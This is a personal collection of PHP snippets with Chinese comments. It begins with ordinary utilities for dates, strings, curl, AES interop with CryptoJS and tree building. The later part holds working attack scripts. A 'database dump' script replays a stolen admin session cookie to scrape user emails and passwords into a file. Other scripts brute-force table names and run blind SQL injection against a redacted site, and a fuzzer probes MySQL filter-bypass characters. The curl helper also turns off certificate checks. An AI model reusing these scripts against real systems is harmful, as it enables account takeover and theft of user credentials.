#php 日期转换成TZ格式
$time_tz_str = str_replace('+00:00', 'Z', gmdate('c', time()));
#2020-07-21T12:11:11Z
#trim 移除字符串
function strim($string,$removestring){
if (!is_string($string) || !is_string($removestring)){
return $string;
}
$result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string);
return $result;
}
#这样改strim会更好一点
function strim($string,$removestring=''){
if (!is_string($string)){
return $string;
}
if (!$removestring){
return trim($string);
}
$result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string);
return $result;
}
#curl request
function curl_request($url,$post='',$cookie='', $returnCookie=0){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
if($post) {
curl_setopt($curl, CURLOPT_POST, 1);
//curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
}
if($cookie) {
curl_setopt($curl, CURLOPT_COOKIE, $cookie);
}
curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响
$data = curl_exec($curl);
if (curl_errno($curl)) {
return curl_error($curl);
}
curl_close($curl);
if($returnCookie){
list($header, $body) = explode("\r\n\r\n", $data, 2);
preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
$info['cookie'] = substr($matches[1][0], 1);
$info['content'] = $body;
return $info;
}else{
return $data;
}
}
#php remove bom str
function str_remove_bom($str){
$charset[1] = substr($str, 0, 1);
$charset[2] = substr($str, 1, 1);
$charset[3] = substr($str, 2, 1);
if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
$rest = substr($str, 3);
return $rest;
} else{
return $str;
}
}
#php实现内存地址反转
function array_endtostart($hex){
$a_tmp=str_split($hex,2);
$result=array_reverse($a_tmp);
$hexstr=join("",$result);
return $hexstr;
}
#php 实现汇编中的pxor
function xortnew($a,$b){
$a_tmp=str_split($a,2);
$b_tmp=str_split($b,2);
$result="";
foreach($a_tmp as $key=>$value){
$a_b=hex2bin($value);
$b_b=hex2bin($b_tmp[$key]);
$r = $a_b ^ $b_b;
$result .=bin2hex($r);
}
return $result;
}
var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));
#php 查找字符串与替换
function tapreplace($str){
$newstr=preg_replace_callback("/(<pre.*<\/pre>)/s",function ($match){
$text=preg_replace("/\t/"," ",$match[0]);
$text=preg_replace("/'/","'",$text);
$text=preg_replace("/#/","#",$text);
$text=preg_replace("/\"/",""",$text);
$text=preg_replace("/'/","'",$text);
return $text;
},$str);
return $newstr;
}
#dokuwiki在php7下报operator not supported for strings in 错
inc\lessc.inc.php
public $importDir = ''; #改为 public $importDir = array();
#CryptoJS 与php互通
#CryptoJS 中
#128位AES加密
var key = CryptoJS.lib.WordArray.random(16);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str);
#192 aes
var key = CryptoJS.lib.WordArray.random(24);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str);
#256 aes:
var key = CryptoJS.lib.WordArray.random(32);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);
#php try catch warning
set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext) {
// error was suppressed with the @-operator
if (0 === error_reporting()) {
return false;
}
throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});
#然后直接try就可以了
try{
if (preg_match("/{$rule}/", $result['url'])) {
$end['match']=1;
$end['code_error']=0;
}
if ($result['code'] == 404) {
$end['code_error']=1;
}
}catch (Exception $e){
var_dump($rule);
}
#数组对象转换
/**
* 数组 转 对象
*
* @param array $arr 数组
* @return object
*/
function array_to_object($arr)
{
if (gettype($arr) != 'array')
{
return;
}
foreach ($arr as $k => $v)
{
if (gettype($v) == 'array' || gettype($v) == 'object')
{
$arr[$k] = (object)array_to_object($v);
}
}
return (object)$arr;
}
/**
* 对象 转 数组
*
* @param object $obj 对象
* @return array
*/
function object_to_array($obj)
{
$obj = (array)$obj;
foreach ($obj as $k => $v)
{
if (gettype($v) == 'resource')
{
return;
}
if (gettype($v) == 'object' || gettype($v) == 'array')
{
$obj[$k] = (array)object_to_array($v);
}
}
return $obj;
}
#一个无极限分类
function get_tree($result){
$tree = array();
foreach($result as $item){
if(isset($result[$item['pid']])){
$result[$item['pid']]['son'][] = &$result[$item['pro_id']];
}else{
$tree[] = &$result[$item['pro_id']];
}
}
return $tree;
}
//生成无极限的数据
//用递归展示处理的数据
function getviewdata($data,$level=0){
foreach($data as $key=>$value){
for($i=0;$i<=$level;$i++){
echo '  ';
}
echo $value['pro_name'];
echo '<br>';
if(!empty($value['son'])){
getviewdata($value['son'],$level+1);
}
}
}
getviewdata($xx);
#某脱库脚本
function getuidinfo($i){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}
$result_out=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}
preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result);
$result_out[]=$a_result[1];
$account_name = $a_result['2'];
}
if (!isset($account_name)){
return array();
}
$result_out=array_unique($result_out);
$return['email']=$account_name;
$return['pid']=$result_out;
return $return;
}
function getproduct($product_id){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}
$result=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}
preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result);
$result=$a_result[1];
}
if(!$result){
return array();
}
return $result;
}
for($i=1;$i<32167;$i++){
$uidinfo = getuidinfo($i);
if(!$uidinfo){
continue;
}
echo $i."\n";
$strs = "uid:{$i} email:".$uidinfo['email'].":";
$pwd_tmp=array();
foreach($uidinfo['pid'] as $pid){
$pwd = getproduct($pid);
if(!$pwd){
continue;
}
$pwd_tmp[]=$pwd;
}
$pwd_tmp=array_unique($pwd_tmp);
$pwd_str =implode("|",$pwd_tmp);
$strs .=$pwd_str."\n";
file_put_contents("pwd.txt",$strs,8);
sleep(0.5);
}
#thinkphp路由模式
http://www.xxx.net/product/index/xxx/id/29192 => http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192
#跑表名
set_time_limit(0);
$tables = file("tables");
foreach ($tables as $a_tables){
$a_tables = trim($a_tables);
$url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
$garbage = strstr($output, "exist");
if($garbage == false)
{
echo $a_tables."<br>";
}
sleep(2);
}
#inject
$i = $_GET['id'];
sleep(1);
$url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
#fuzz1
<?php
$con=mysqli_connect("localhost","root","123456","test");
if (mysqli_connect_errno($con))
{
echo 111;
exit;
}
for($i=0;$i<255;$i++) {
for($j=0;$j<255;$j++) {
$char_str = chr($i);
$charj_str = chr($j);
$strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`";
$result=mysqli_query($con,$strs);
$posts = array();
while($row = @mysqli_fetch_array($result)) {
$posts[] = $row;
}
if(isset($posts[0]) && $posts[0][0]==10 ){
echo "<font color=red>aaaa</font>{$i}|{$j}<br>";
}
}
}
mysqli_close($con);
#毫秒
list($usec, $sec) = explode(" ", microtime());
$lusec = sprintf('%03d',$usec*1000);